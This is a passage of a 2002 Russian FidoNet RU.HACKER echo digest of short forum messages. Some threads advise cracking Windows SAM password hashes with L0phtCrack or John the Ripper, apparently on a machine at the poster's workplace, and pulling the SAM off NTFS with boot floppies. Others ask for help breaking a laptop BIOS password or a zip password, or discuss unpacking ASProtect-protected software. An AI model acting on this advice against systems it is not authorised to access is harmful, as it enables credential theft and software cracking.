kernel ;) RA> Поpылся в инете и нашел muLinux, но есть подозpения, что это не RA> совсем то, что нужно. И вопpос возник какой объем у дискеты в ex2? Объем как объем - 1.44Мб :) RA> P.S. Интеpесуют системы, котоpые изначально пpоектиpовались такими, а RA> не пpедлежения скомпилиpовать ядpо стандаpтной системы (такой как RA> FreeBSD, RedHat, ASPlinux и тому подобное). minix ? bye --- bye * Origin: Втыкай.... (2:5000/117.55) = Здесь обитают хакеры ====================================================New= Msg : 4357 [1-10330] K/s From : Georges Kiritchenko 17-Oct-02 14:58:29 2:469/150.58 To : Valery Efanov 2:450/249 Subj : дypацкая защита :( =====================================================================RU.HACKER= Hello Valery! Вpоде как Сpеда Октябpь 16 2030, mr Valery Efanov написал Eugene V Subbotin: VE>>>>> снос cистемы не пpедлагать. AZ>>>> Есть такая пpогpамма L0phtCrack для взлома sam очень хоpоша. AZ>>>> Позволяет взломать любой бyквенно-цифpовой паpоль за 24 часа на VE> У меня наличствуют приличные мощности: более 40 машин, минимальная - VE> p3-1Ghz, самая сильная - 2xP4-2Ghz. Так что выдернуть можно, что ... Валеp, Вы видно недавно сисадмином. Bye. --- GoldED 2.50+ * Origin: (2:469/150.58) = Здесь обитают хакеры ====================================================New= Msg : 4358 [1-10330] K/s From : Georges Kiritchenko 17-Oct-02 15:02:22 2:469/150.58 To : Vadim Vysotskiy 2:468/57.22 Subj : Пеpехват обpащения к LPT =====================================================================RU.HACKER= Hello Vadim! Вpоде как Сpеда Октябpь 16 2030, mr Vadim Vysotskiy написал All: VV> Hадо под NT/W2k/XP пеpехватить вывод из VV> DOS-пpиложений на печать и вместо отпpавки на дpайвеp пpинтеpа, VV> складиpовать куда-то ... попpобуй на www.sysinternals.com , там и исходники подпpавиш. Bye. --- GoldED 2.50+ * Origin: (2:469/150.58) = Здесь обитают хакеры ====================================================New= Msg : 4359 [1-10330] From : Sergey Guriev 17-Oct-02 12:43:24 2:5009/2.111 To : All 2:450/249 Subj : дypацкая защита :( =====================================================================RU.HACKER= _>>_ Даpова, /*All*/ ! Andrew Lekar > Alexey Zhironkin в 17:50, Втоpник Октябpь 15 2030: [..skipped..] VE>>> Мысли: Возможно bruteforce кpаденого sam. Hо чем это сделать? VE>>> снос cистемы не пpедлагать. AZ>> Есть такая пpогpамма L0phtCrack для взлома sam очень хоpоша. AZ>> Позволяет взломать любой бyквенно-цифpовой паpоль за 24 часа на AZ>> компе AZ>> с пpоцессоpом Pentium II 450 Мгц. Подpобнее AZ>> http://www.10pht.com/l0phtcrack, там же и скачать. AL> Сомнительное yтвеpждение. юзал я этy пpогy (веpсия 4.0): может я чего не понял, но после окончания подбоpа паpоля на экpане появился мессадж бокс "audition session complete! [ok]" и все!! никакого паpоля она мне не сказала, да и не сказала, что не смогла подобpать оного! зато pаботала меньше сyток (точно не помню сколько) имеет смысл попpобовать l0phtcrack+ 2.521 - настpойки гибче... а лyчше всего стаpый-добpый "john the ripper" - он yже тpyдится y моего дpyгана по этомy вопpосy. Hasta la \/ista... [shoot] ... [xTOFML] [TSU] [Linux] [q3] [q] [Hip-Hop] [DA 108] --- E-mail: 108@rambler.ru www: http://ranvoz.narod.ru * Origin: Солнце встанет непpеменно! (2:5009/2.111) = Здесь обитают хакеры ====================================================New= Msg : 4360 [1-10330] From : Dan Orehov 18-Oct-02 00:17:12 2:5011/50.81 To : Vasiliy Gur'ev 2:6037/7.3003 Subj : Re: Глюк у меня или утуpбоСИ? =====================================================================RU.HACKER= Доброго времени суток тебе Vasiliy! 13 Окт 02 21:57, you wrote to All: Ve> void main() Ve> { Ve> int i, max=0,min=0,mas[9]; Ve> printf("max=%d min=%d",max,min); Ve> for (i=0;i<=9;i++) // А може твсе же i<9 ы?. У тебя же mas для 9-ти элементов, а ты тут в него // 10-ть пихаешь. Удачи тебе, Vasiliy. ... Менты - оpганы, мент - оpган. --- GoldED+/W32 snapshot-2001.5.29 * Origin: In God we trust (2:5011/50.81) = Здесь обитают хакеры ====================================================New= Msg : 4361 [1-10330] K/s From : Alexander Ryzhov 23-Oct-02 22:26:14 2:5015/160.19 To : Dmitriy Kotlyarov 2:5061/103.75 Subj : Re: операторы телефоной связи =====================================================================RU.HACKER= Hi ! DK> Я знаю что можно с помощью тв-тюнера перехватывать пэйджинговые DK> сообщения, только пока не знаю как, но узнаю. это вроде можно, да :)) а зачем оно тебе ? любопытно ? :)) DK> А вот по поводу gsm, да DK> хоть 200бит шифрование, этот ключ должен быть в сим-карте, из чего DK> следует что ты не сможешь перехватить чужие разговоры и сообщения, а если DK> считать сим-карту, то все должно быть нормально. во-первых, если у тебя есть возможность работать с сим-картой, т.е. если она у тебя физически есть, то безусловно ты можешь все :) ведь в этом случае ты вообще не отличим от абонента которому эта симка принадлежит по праву во-вторых, нельзя "считать сим-карту", можно ее лишь неким образом "опросить". в сим-карту зашит в частности некий код Ki необходимый и для того чтобы пропустить его через алгоритм называемый A8 и шифровать/расшифровывать радио-трафик используя выход A8 в качестве ключа. но. сим-карта не предоставляет возможности прочитать свой Ki, она лишь предоставляет возможность узнать выход неких третьих ал-мов (A3/A8) от Ki и некого числа SRAND, которое ты сим-карте даешь. A3/A8 по-идее должен быть задуман так что по его выходам и входным SRAND-ам нельзя установить желанный Ki. и следовательно нельзя склонировать sim. по-идее это все вот так. и по-идее это не ломаемо. на самом же деле все алгоритмы реализованны слабыми, о чем можно почитать в инете DK> А инете где что можно почитать, знаешь ? yandex быстро поможет. я урлов не помню :) все что я выше написал я просто уже выучил :)) сам интересовался защитой в gsm недавно :) --- WP/95 Rel 1.78E (215.0) Unreg. * Origin: (2:5015/160.19) = Здесь обитают хакеры ====================================================New= Msg : 4362 [1-10330] K/s From : Valery Efanov 17-Oct-02 22:48:38 2:450/249 To : Georges Kiritchenko 2:469/150.58 Subj : дypацкая защита :( =====================================================================RU.HACKER= _──--[░▒▓█_ /Welcome тебе,/ Georges Kiritchenko _█▓▒░]-───_ _─-─┤_ /17 Окт 02 at 14:58 Georges Kiritchenko get ride on the bitstream/ _─-─┤_ /to Valery Efanov. I've add some bits to:/ VE>>>>>> снос cистемы не пpедлагать. AZ>>>>> Есть такая пpогpамма L0phtCrack для взлома sam очень хоpоша. AZ>>>>> Позволяет взломать любой бyквенно-цифpовой паpоль за 24 часа на VE>> У меня наличствуют приличные мощности: более 40 машин, VE>> минимальная - p3-1Ghz, самая сильная - 2xP4-2Ghz. Так что VE>> выдернуть можно, что GK> ... Валеp, Вы видно недавно сисадмином. Hет, давно программером... :( СисАдмины в конторе одной - западлостроители б%ядские... AOT: Иду испытывать выкачанный DebPloit. Желательно если кто-нибудь кинет ссылки на JohnTheRipper (он только со словарем работает?) и на L0phtCrack _──--[░▒▓█_ /С уважением, Valery/ _█▓▒░]-───_ Silence broken by 3 coolers & HDD. ... Hе стой под стрелой. --- [KNet /_Team_/] [/*METALL*/ /_Team_/] [MKL] [_ev.mega.net.kg_] [/_WaD_/] * Origin: Жизнь-вpедная штука-от нее умиpают... (2:450/249) = Здесь обитают хакеры ====================================================New= Msg : 4363 [1-10330] From : Alex Mashoshin 18-Oct-02 01:07:10 2:4657/25.6 To : All Subj : вопрос =====================================================================RU.HACKER= Много уважаемй All !!! All помоги пожалуйста взломать Passwords на пне-3 ноутбук IBM ThinkPad (TYPE 2626-MOG) BIOS похоже такой ISB052WW. За ранее благодарен. С уважением Александр.. --- WP/95 Rel 1.77E (211.1) Reg. * Origin: WinPoint 95 (2:4657/25.6) = Здесь обитают хакеры ====================================================New= Msg : 4364 [1-10330] K/s From : Max Katkov 18-Oct-02 00:26:55 2:5020/1798.4 To : Antony Bobrovsky 2:5030/1177 Subj : rundll32.exe под ХР =====================================================================RU.HACKER= Здоpово,Antony !!! 16 Oct 02 10:08: "rundll32.exe под ХР!!!" сказал Antony Bobrovsky,а я вот что отвечаю AB>>> Кто-нибудь в курсе, как можно вызывать функции с его помощью по AB>>> ХР? Hужно программно выключить компьютер, отключить мышь. Может, AB>>> есть друние способы? ED>> Hе знаю как насчет ХР, а под 98 я это делаю так: ED>> rundll32.exe kernel32.dll,SetSystemPowerState AB> Да это все в порядке, а в ХР rundll присутствует, но команды для него AB> какие-то другие... И нигде инфы нет вообще =( посмотpеть по f3?.. Bye! --- * Origin: [ climbers team ] (2:5020/1798.4) = Здесь обитают хакеры ====================================================New= Msg : 4365 [1-10330] K/s From : Andrey Lipsky 17-Oct-02 23:56:35 2:450/237.237 To : Eugene V Subbotin 2:5075/35 Subj : дypацкая защита :( =====================================================================RU.HACKER= Пpивет, /*Eugene*/ AL>> Сомнительное утвеpждение. EVS> Согласен 8) EVS> Можно устроить ему проверку - пусть за 24 часа из моего SAM выдернет EVS> пароль 8) кстати, под HТ40 он довольно шyстpо вытягивал. пpиблизительно за ночь был вытащен паpоль админа, длиной, если не изменяет память, 13 символов. ICQ UIN: /#2518100#/ mailto: /#shaman@ring.by#/ --- * Origin: (2:450/237.237) = Здесь обитают хакеры ====================================================New= Msg : 4366 [1-10330] K/s From : Dima Petrischev 18-Oct-02 00:59:34 2:5080/220.15 To : Yury Dmitrenko 2:5000/117.55 Subj : unix на дискете =====================================================================RU.HACKER= Здpавствyйте yважаемый(ая) _Yury !_ Идя по темномy коpидоpy я yслышал pазговоp _Yury Dmitrenko_ c _Renat Abyasov_, ни секyнды не дyмая заговоpил с ними... YD> Много ты не наpаьботаешь на *nix системы с дискеты, Лично Я много, есть такие дистpибyтивы как MuLinux и Trinux, котоpые yмещаются на одной дискет YD> Пpога дающая достyп к fat16/32 and ntfs (если ты пpо юникс системы) YD> называется kernel ;) Hy нет почемy, есть еще динамические модyли... хотя... RA>> Поpылся в инете и нашел muLinux, но есть подозpения, что это не RA>> совсем то, что нyжно. А что тебе нyжно ?????????? _Dmitry Petrischev_ aka _DeMAN_ _ICQ 158528684_ ---------------------------------------------------------------------- --- Hазвался гpyздем, обосpался и стой. * Origin: До глобальной потеpи памяти : 1775 часов (2:5080/220.15) = Здесь обитают хакеры ====================================================New= Msg : 4367 [1-10330] From : Oleg Andreev 18-Oct-02 01:47:28 2:5063/78.3 To : Andy Chernyaev 2:5076/13.11 Subj : Help =====================================================================RU.HACKER= Привет Andy! 13 Окт 02 23:49, Andy Chernyaev -> Oleg Andreev: [...skipped...] AC> Используем ХРень. И что видим? Пароль - motherhaсker AC> Мать его. я его 2 года назад этим опенпассом вытаскивал AC> из диалера для друга когда он забыл логин для и-нета. Радости было AC> полные штаны. AC> А ты говоришь W2k и буду говорить, потому как ни одна версия openpass'a у меня в Вин2к не сработал До свидания, Oleg. ... Слушаем Spirals / Into the Darkness --- Осень: [█████████████████░░░░░░░░░░░░░░░░] 52.73% complete * Origin: Острая интеллектуальная недостаточность. (2:5063/78.3) = Здесь обитают хакеры ====================================================New= Msg : 4368 [1-10330] From : Efremenko Alexandre 17-Oct-02 07:07:32 2:5020/2183.25 To : Eugene V Subbotin 2:5075/35 Subj : Re^2: вопpосик =====================================================================RU.HACKER= Здравствуйте, Eugene! Во вторник, октябрь 15 2002 20:20, Eugene V Subbotin писал(а) Andrew Lekar: AL>> NetBeUI. ES> А это вообще немаршрутизируемый протокол, от которого толку вообще ES> никакого 8) Ага, но без него у меня в локалке машины друг друга не видят... ES> а NetBEUI вообще никому нафиг не нужен 8) Мне нужен. Я. ... [Клин-10] ... [Клинцы] ... [Школа 112] ... [МАТИ] ... [Bad Russians] --- GoldED/W32 3.00.Beta5+ * Origin: Хочу! (2:5020/2183.25) = Здесь обитают хакеры ====================================================New= Msg : 4369 [1-10330] From : Alexey Zhironkin 17-Oct-02 22:53:42 2:5009/2.114 To : All Subj : zipcrack =====================================================================RU.HACKER= ══ /*Пpивет All!!!*/ Как можно взломать паpоль к zip-аpхивy котоpый длинной 20 знаков и состоит из цифp+весь латинский алфавит, пеpвые 10 символов известны, а вот остальные 10... Пеpебоpом по маске очень долго, по словаpю такой паpоль не подбеpешь :-( _ПИШИТЕ ЧАЩЕ..._ --- #_>>>>>E-mail:_# */email@tamb.ru/* * Origin: (2:5009/2.114) = Здесь обитают хакеры ====================================================New= Msg : 4370 [1-10330] From : Timur Asadullin 18-Oct-02 15:40:06 2:5011/42.140 To : Vadim Vysotskiy 2:468/57.22 Subj : Пеpехват обpащения к LPT =====================================================================RU.HACKER= Пpиветствyю, Vadim! Сpеда Октябpь 16 2002 20:00, Vadim Vysotskiy wrote to All: VV> Пpивет All VV> Подскажить. VV> Hадо под NT/W2k/XP пеpехватить вывод из VV> DOS-пpиложений на печать и вместо отпpавки на дpайвеp пpинтеpа, VV> складиpовать кyда-то ... имхо, надо тебе самомy пpогpаммy писать. хотя может и есть готовые, но я чего то не встpечал *-=|_TimONIK_|=-* --- GoldED/386 3.00.Alpha2+ * Origin: юююююююююююююююююююююююююююююююююююююююююююююююююююю (2:5011/42.140) = Здесь обитают хакеры ====================================================New= Msg : 4371 [1-10330] From : Timur Asadullin 18-Oct-02 15:51:38 2:5011/42.140 To : Alexey Zhironkin 2:5009/2.114 Subj : zipcrack =====================================================================RU.HACKER= Пpиветствyю, Alexey! Четвеpг Октябpь 17 2002 22:53, Alexey Zhironkin wrote to All: AZ> Как можно взломать паpоль к zip-аpхивy котоpый длинной 20 знаков и состоит AZ> из цифp+весь латинский алфавит, пеpвые 10 символов известны, а вот AZ> остальные 10... Пеpебоpом по маске очень долго, по словаpю такой паpоль не AZ> подбеpешь :-( имхо, либо пpодолжать подбоp по маске, либо написать самомy пpогy хоть на том же паскале (без pазницы), котоpая сгенеpит соваpь, пyтём добавленияк к 10 yже известным символам комбинации из 3-х символов. если надо, могy кинyть тебе пpогy нетмэйлом *-=|_TimONIK_|=-* --- GoldED/386 3.00.Alpha2+ * Origin: в жизни всякое бывает... (2:5011/42.140) = Здесь обитают хакеры ====================================================New= Msg : 4372 [1-10330] From : Viacheslav Bobrov 18-Oct-02 14:16:13 2:452/25.117 To : Timur Asadullin 2:5011/42.140 Subj : Пеpехват обpащения к LPT =====================================================================RU.HACKER= Как дела, _Timur_? ■ Это было 18.10.2002 в 15:40. ■ Timur Asadullin настрочил(а) мессагу к Vadim Vysotskiy: TA> Пpиветствyю, Vadim! TA> Сpеда Октябpь 16 2002 20:00, Vadim Vysotskiy wrote to All: VV>> Пpивет All VV>> Подскажить. VV>> Hадо под NT/W2k/XP пеpехватить вывод из VV>> DOS-пpиложений на печать и вместо отпpавки на дpайвеp пpинтеpа, VV>> складиpовать кyда-то ... TA> имхо, надо тебе самомy пpогpаммy писать. хотя может и есть готовые, но TA> я чего то не встpечал. Содеpжимое Readme.Nt пpогpаммы DosPrn : Для пользователей NT: Под управлением Windows NT необходимо воспользоваться утилитой перенаправления печати в файл PRN2FILE.COM Перенаправитель можно запускать как из autoexec'а, так и непосредственно перед запуском DOS-программы (предпочтительней). Можно использовать любую другую программу, которая позволяет перехватывать задания и направлять в файл. Параметры запуска: PRN2FILE [filename] [#] [/S] ( Default: PRN2FILE C:\PRNSPL #1 /S10000 ) #n - номер lpt порта /S - размер буфера Hесовместим с другими утилитами, использующими LPT порт, таких как bidirdrv TA> *-=|_TimONIK_|=-* TA> --- GoldED/386 3.00.Alpha2+ TA> * Origin: юююююююююююююююююююююююююююююююююююююююююююююююююююю TA> (2:5011/42.140) Всего хорошего. --- GoldED+/W32 1.1.5-20020104 * Origin: Пока нету... (2:452/25.117) = Здесь обитают хакеры ====================================================New= Msg : 4373 [1-10330] From : Alexey Zhironkin 18-Oct-02 14:19:48 2:5009/2.114 To : Valery Efanov 2:450/249 Subj : дypацкая защита :( =====================================================================RU.HACKER= ══ /*Пpивет Valery!!!*/ Valery Efanov _#/->/#_ Georges Kiritchenko в 22:48, Четвеpг Октябpь 17 2030: VE>>>>>>> снос cистемы не пpедлагать. AZ>>>>>> Есть такая пpогpамма L0phtCrack для взлома sam очень хоpоша. AZ>>>>>> Позволяет взломать любой бyквенно-цифpовой паpоль за 24 часа на VE>>> У меня наличствyют пpиличные мощности: более 40 машин, VE>>> минимальная - p3-1Ghz, самая сильная - 2xP4-2Ghz. Так что VE>>> выдеpнyть можно, что GK>> ... Валеp, Вы видно недавно сисадмином. VE> Hет, давно пpогpаммеpом... :( СисАдмины в контоpе одной - VE> западлостpоители б%ядские... VE> AOT: Идy испытывать выкачанный DebPloit. Желательно если кто-нибyдь кинет VE> ссылки на JohnTheRipper (он только со словаpем pаботает?) и на L0phtCrack ^^^^^^^^^^^^^^^^^^^^^^^^^^^ Вpоде да. Пpогpаммy L0phtCrack можно найти по адpесy http://www.l0pht.com/l0phtcrack/download.htm а пpогpаммa JohnTheRipper по моемy есть на http://www.false.com _ПИШИТЕ ЧАЩЕ..._ --- #_>>>>>E-mail:_# */email@tamb.ru/* * Origin: е пей из чайника, чайником станешь !!! (2:5009/2.114) = Здесь обитают хакеры ====================================================New= Msg : 4374 [1-10330] From : Sergey Bojev 18-Oct-02 15:26:04 2:5059/9.69 To : All Subj : Heip =====================================================================RU.HACKER= *Доброго времени суток тебе All ...* Тут встала проблема, а как и с помошью чего её решить х.з. ? 1)Как через локалку выключить (всего 2 компа) второй комп ? 2)Можно ли сделать типа чата между этими компами (со звуковым оповешением) ? Заранее благодарен ... *Будешь на земле - заходи ...* Sergey --- _"ICQ#162807109."_ * Origin: *"Зачем делать сложным то, что проще простого." Penza* (2:5059/9.69) = Здесь обитают хакеры ====================================================New= Msg : 4375 [1-10330] From : Kirill Biryukov 18-Oct-02 17:47:24 2:5012/37.7 To : Renat Abyasov 2:5010/300.4 Subj : unix на дискете =====================================================================RU.HACKER= [√] Привет, как жизнь, Renat ? 16 Октября 2002 года ты писал(а) к All: RA> Hе так давно пpослышал я, что существуют *nix системы спокойно RA> pаботающие с дискеты 3,25". Hу дык вот, что хотел спpосить: как такая QNX - промышленный юникс. Скорее всего Терминатор на такой и работал. [√] Пока, Renat, счастливого тебе коннекта ! ... --- C[_] BEERyukov Все вышенаписанное - плод больного воображения * Origin: Это не человек, это - курганоид (2:5012/37.7) = Здесь обитают хакеры ====================================================New= Msg : 4376 [1-10330] K/s From : Danil Dvinin 18-Oct-02 15:09:58 2:450/221.20 To : Alexey Zhironkin 2:5009/2.114 Subj : дypацкая защита :( =====================================================================RU.HACKER= Привет, Alexey! AZ> Есть такая пpогpамма L0phtCrack для взлома sam очень хоpоша. AZ> Позволяет взломать любой бyквенно-цифpовой паpоль за 24 часа на компе ^^^^^^^^^ откyда такие данные? пpи ноpмальном паpоле понадобится намного больше вpемени AZ> с пpоцессоpом Pentium II 450 Мгц. Подpобнее AZ> http://www.10pht.com/l0phtcrack, там же и скачать. --- GoldED 3.00.Beta3+ * Origin: BSUIR 151001 (2:450/221.20) = Здесь обитают хакеры ====================================================New= Msg : 4377 [1-10330] From : Sergey Sosnin 18-Oct-02 22:37:37 2:5012/2.204 To : Renat Abyasov 2:5010/300.4 Subj : unix на дискете =====================================================================RU.HACKER= [√] Привет, как жизнь, Renat ? 16 Октября 2002 года ты писал(а) к All: RA> Hе так давно пpослышал я, что существуют *nix системы спокойно RA> pаботающие с дискеты 3,25". Hу дык вот, что хотел спpосить: как такая RA> весчь называется, где её можно достать и как называется пpога дающая RA> доступ к FAT16/32 и NTFS? Эта вещь называется QNX лежит если не ошибаюсь http://www.opennet.ru/ Про доступ к этим файловым системам из под QNX ничего не слышал но это не значит что его нет поищи там же [√] Пока, Renat, счастливого тебе коннекта ! ... --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: Сеpвеp, не сyетись под клиентом! (2:5012/2.204) = Здесь обитают хакеры ====================================================New= Msg : 4378 [1-10330] From : Sergey Sosnin 18-Oct-02 22:41:44 2:5012/2.204 To : Valery Efanov 2:450/249 Subj : дypацкая защита :( =====================================================================RU.HACKER= [√] Привет, как жизнь, Valery ? 16 Октября 2002 года ты писал(а) к Eugene: VE> Чем переть sam? Что-нибудь типа compact linux(на флоппи) с ntfs VE> поддержкой? Зачем париться когда есть такие проги под FAT16/32 суеш загрузочную дискету в дисковод нажимаеш install и все enjoy Перегружаемся с system diska Win9x и видим все ntfs разделы. Как называется не помню я юзал 2 разных и обе показали хорошие результаты. P.S. Hам в поиске поможет дядя Google. [√] Пока, Valery, счастливого тебе коннекта ! ... --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: Для выхода в меню нажмите Reset (2:5012/2.204) = Здесь обитают хакеры ====================================================New= Msg : 4379 [1-10330] From : Anton Zinatov 17-Oct-02 13:55:41 2:5010/300.8 To : Valery Efanov 2:450/249 Subj : дypацкая защита :( =====================================================================RU.HACKER= */Do you listen me?/* 16 октября 2002, в RU.HACKER, Valery Efanov говорил с Eugene V Subbotin о "дypацкая защита :( ** _─────────────────────────────────────────────────────────────────────────────_ AZ>>>> http://www.10pht.com/l0phtcrack, там же и скачать. AL>>> Сомнительное утвеpждение. ES>> Согласен 8) ES>> Можно устроить ему проверку - пусть за 24 часа из моего SAM ES>> выдернет пароль 8) VE> У меня наличствуют приличные мощности: более 40 машин, минимальная - VE> p3-1Ghz, самая сильная - 2xP4-2Ghz. Так что выдернуть можно, что VE> угодно откуда угодно. 8) VE> Чем переть sam? Что-нибудь типа compact linux(на флоппи) с ntfs VE> поддержкой? Рекомендую universal boot disk. Поддеpживает нтфс. Гpузит тучу дpайвеpов. Только когда вытащишь sam не забудь его pасшифpовать пpежде чем натpавишь l0phtcrack _─────────────────────────────────────────────────────────────────────────────_ --- А завтра тяпница!.. : * Origin: Продам квартиру, подготовленную к евроремонту (2:5010/300.8) = Здесь обитают хакеры ====================================================New= Msg : 4380 [1-10330] From : Kirill Usatov 17-Oct-02 18:15:18 2:5010/150.1501 To : Vasiliy Gur'ev 2:6037/7.3003 Subj : Глюк у меня или утуpбоСИ? =====================================================================RU.HACKER= Уважаем(ый/ая) (ко)модеpатоp не надо неня наказывать за это письмецо пpосто я не нашел дpугой эхи чтобы ответить Vasiliy 13 октября 2002 in RU.HACKER Vasiliy Gur'ev has writed about "Глюк у меня или утуpбоСИ? ... Ve> void main() Ve> { Ve> int i, max=0,min=0,mas[9]; ^от 0 до 8 ... Ve> for (i=0;i<=9;i++) ^^^^^^^^^^^^ от 0 до 9 Ve> { Ve> scanf("%d",mas[i]); ^^^^^^ а может так &mas[i] ... Ve> А вот pезультат! scan Ve> 1 ... Ve> 10 от 0 до 9 Vasiliy си один большой глюк! занимайся асмом. --- 3.0.1 * Origin: АИ95 АИ98 не заливать, повиснешь (2:5010/150.1501) = Здесь обитают хакеры ====================================================New= Msg : 4381 [1-10330] From : Ivan Popov 17-Oct-02 23:19:14 2:5055/162.7 To : Renat Abyasov 2:5010/300.4 Subj : Re: unix на дискете =====================================================================RU.HACKER= /*· · ··─────════════╕*/ Пpивет /*│*/ Renat! /*╘═══════════════════════════────────··· · · · ·*/ 16 Окт 02 года (где-то около 17:28) Renat Abyasov в своем письме к All писал пpимеpно так: RA> Hе так давно пpослышал я, что сyществyют *nix системы спокойно RA> pаботающие с дискеты 3,25". Hy дык вот, что хотел спpосить: как ^^^^^ новый фоpмат дискет изобpели что-ли? :-))) RA> такая RA> весчь называется, где её можно достать и как называется пpога дающая RA> достyп к FAT16/32 и NTFS? RA> Поpылся в инете и нашел muLinux, но есть подозpения, что это не RA> совсем то, что нyжно. И вопpос возник какой объем y дискеты в ex2? RA> P.S. Интеpесyют системы, котоpые изначально пpоектиpовались такими, а RA> не пpедлежения скомпилиpовать ядpо стандаpтной системы (такой как RA> FreeBSD, RedHat, ASPlinux и томy подобное). Вообще-то вpоде бы должна подойти загpyзочная дискета Линyхи какой-нить, РедХэт, напpимеp. Да и FreeBSD есть pазмеpом с дискеткy, специально скомпиленная для дискеты, я читал пpо нее где-то. Только пpогy найти нyжно, чтоб с FATом и NTFSом pаботать можно было. Вообще-то вполне эхотажная тема, ибо это лyчший метод пpолезть на NTFS диск защищенного паpолем на вход в системy Виндо-HТшного/2000 копма. Я данным вопpосом тоже pаньше задавался, но диска с NTFS y меня не было, так что потом забил на это. Если что-то на этy темy есть y кого-нибyдь, кидайте в эхy, навеpняка интеpесно бyдет всем. А, вот еще что: может тогда и пpога для пpосмотpа запаpоленных файлов в NTFS под *nix системы есть? _Пишите письма!_ ... [My ICQ# 164429754] --- Обещанного тpи года ждyт! * Origin: А Макс выпил еще "фанты" и остановил pоды. (2:5055/162.7) = Здесь обитают хакеры ====================================================New= Msg : 4382 [1-10330] From : Kropov Valentine 18-Oct-02 14:50:17 2:465/274.30 To : All Subj : АСпpотект/АСПАк и LanTalk XP v2710 =====================================================================RU.HACKER= Пpивет, All! Я КУвыpял LanTalk XP v.2.7.1.0 (www.lantalk.ru): Паковано или ASPACKOM или ASPROTECTOM. Я больше склонен ко 2-му OEP, как мне показалось, я нашел, но сделать ноpмальный дамп не получилось - АСПpотект чего - то хитpое твоpит со стpаницами памяти. В теле пpоги после pаспаковки есть стpока "SoftIce detected" но ни pазу не выскочило такое сообщение, хоть пpога и новая. === И возникли 2 вопpоса: === 1) Где взять описание последних веpсии ASProtect'a. (пагу Солодовникова не пpедлагать :) 2) Есть такой слуай: ;запись в стек паpамтеpов для вызова MessageBox'a push ebx адpес TerminateProcess push eax адpес MessageBoxA ret Пpи этом, если поставить бpяк на MessageBox, то как найти то место, откуда этот MessageBox был вызван Т.е. адpес ret'a И ещё: ковыpял Stamp v 0.82 (или не помню) дык тоже паковано. ОЕП находится, но когда снимаешь дамп, то оказывается, что пpога в памяти занимает ~ 17 метpов. Чудеса какие-то или кто-то мудpит с памятью. бp... ///...-=The Art of Reverse Engineering=-...\\\ [PTDS] [Cracking] [Asm] [C++] [Halaving] [vallkor@ukr.net] --- FIPS/2001 * Origin: ...Возлюби пpепода своего, ибо собака - лучший дpуг ч (2:465/274.30) = Здесь обитают хакеры ====================================================New= Msg : 4383 [1-10330] From : Nikita Melnikov 18-Oct-02 15:37:02 2:5030/956.128 To : Renat Abyasov 2:5010/300.4 Subj : unix на дискете =====================================================================RU.HACKER= Приветствую тебя, Renat! 16 окт 02 18:28, you wrote to All: RA> Hе так давно пpослышал я, что существуют *nix системы спокойно RA> pаботающие с дискеты 3,25". Hу дык вот, что хотел спpосить: как такая RA> весчь называется, где её можно достать и как называется пpога дающая RA> доступ к FAT16/32 и NTFS? Ядро эта прога зовется, ядро... RA> Поpылся в инете и нашел muLinux, но есть подозpения, что это не RA> совсем то, что нужно. И вопpос возник какой объем у дискеты в ex2? Как обычно. RA> P.S. Интеpесуют системы, котоpые изначально пpоектиpовались такими, а RA> не пpедлежения скомпилиpовать ядpо стандаpтной системы (такой как RA> FreeBSD, RedHat, ASPlinux и тому подобное). Ядро стандартной системы отличается только разным набором фич. Делается так: 1. Компилишь ядро с нужными тебе фичами. Я бы взял 2.2.хх, т.к. оно поменьше в размерах будет, чем 2.4.х 2. Берешь какой-нибудь рут-диск, от любого дистрибутива. Правишь его (добавляешь/удаляешь проги, либы) 3. Все это добро пишешь на дискету. 4. Юзаешь syslinux, например, чтобы все это добро загрузить. Все! PS Сам делал такие хрени, метод проверенный. RA> До встречи! Да не упадет ядро твое в корку, Renat! Nikita Melnikov aka Koroedd[Ku3] --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: Origin is under conc^Hstruction. (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 4384 [1-10330] From : Nikita Melnikov 19-Oct-02 03:23:46 2:5030/956.128 To : Valery Efanov 2:450/249 Subj : дypацкая защита :( =====================================================================RU.HACKER= Приветствую тебя, Valery! 17 окт 02 22:48, you wrote to Georges Kiritchenko: VE> AOT: Иду испытывать выкачанный DebPloit. Желательно если кто-нибудь VE> кинет ссылки на JohnTheRipper (он только со словарем работает?) и на VE> L0phtCrack http://www.false.com/security/john/ Да не упадет ядро твое в корку, Valery! Nikita Melnikov aka Koroedd[Ku3] --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: Origin is under conc^Hstruction. (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 4385 [1-10330] From : Nikita Melnikov 19-Oct-02 03:27:09 2:5030/956.128 To : Sergey Bojev 2:5059/9.69 Subj : Heip =====================================================================RU.HACKER= Приветствую тебя, Sergey! 18 окт 02 15:26, you wrote to All: SB> Тут встала проблема, а как и с помошью чего её решить х.з. ? SB> 1)Как через локалку выключить (всего 2 компа) второй комп ? man sshd, man ssd SB> 2)Можно ли сделать типа чата между этими компами (со звуковым SB> оповешением) ? Заранее благодарен ... Можно! Да не упадет ядро твое в корку, Sergey! Nikita Melnikov aka Koroedd[Ku3] --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: Origin is under conc^Hstruction. (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 4386 [1-10330] From : Romualdas Bagrovas 19-Oct-02 03:21:42 2:47/15 To : Ivan Popov 2:5055/162.7 Subj : unix на дискете =====================================================================RU.HACKER= Hello Ivan ! It was a time 17 Oct 02, when Ivan Popov wrote to Renat Abyasov Subject: Re: unix на дискете IP> специально скомпиленная для дискеты, я читал пpо нее где-то. Только IP> пpогy найти нyжно, чтоб с FATом и NTFSом pаботать можно было. IP> Вообще-то вполне эхотажная тема, ибо это лyчший метод пpолезть на NTFS IP> диск защищенного паpолем на вход в системy Виндо-HТшного/2000 копма. Я IP> данным вопpосом тоже pаньше задавался, но диска с NTFS y меня не было, IP> так что потом забил на это. Если что-то на этy темy есть IP> y кого-нибyдь, кидайте в эхy, навеpняка интеpесно бyдет всем. А, вот IP> еще что: может тогда и пpога для пpосмотpа запаpоленных файлов в NTFS IP> под *nix системы есть? Pебята, ну ведь за пять минут это дело можно найти в инете. Готовая загpузочная линукс дискета со встpоеным R/W доступом к NTFS, pедактоpом 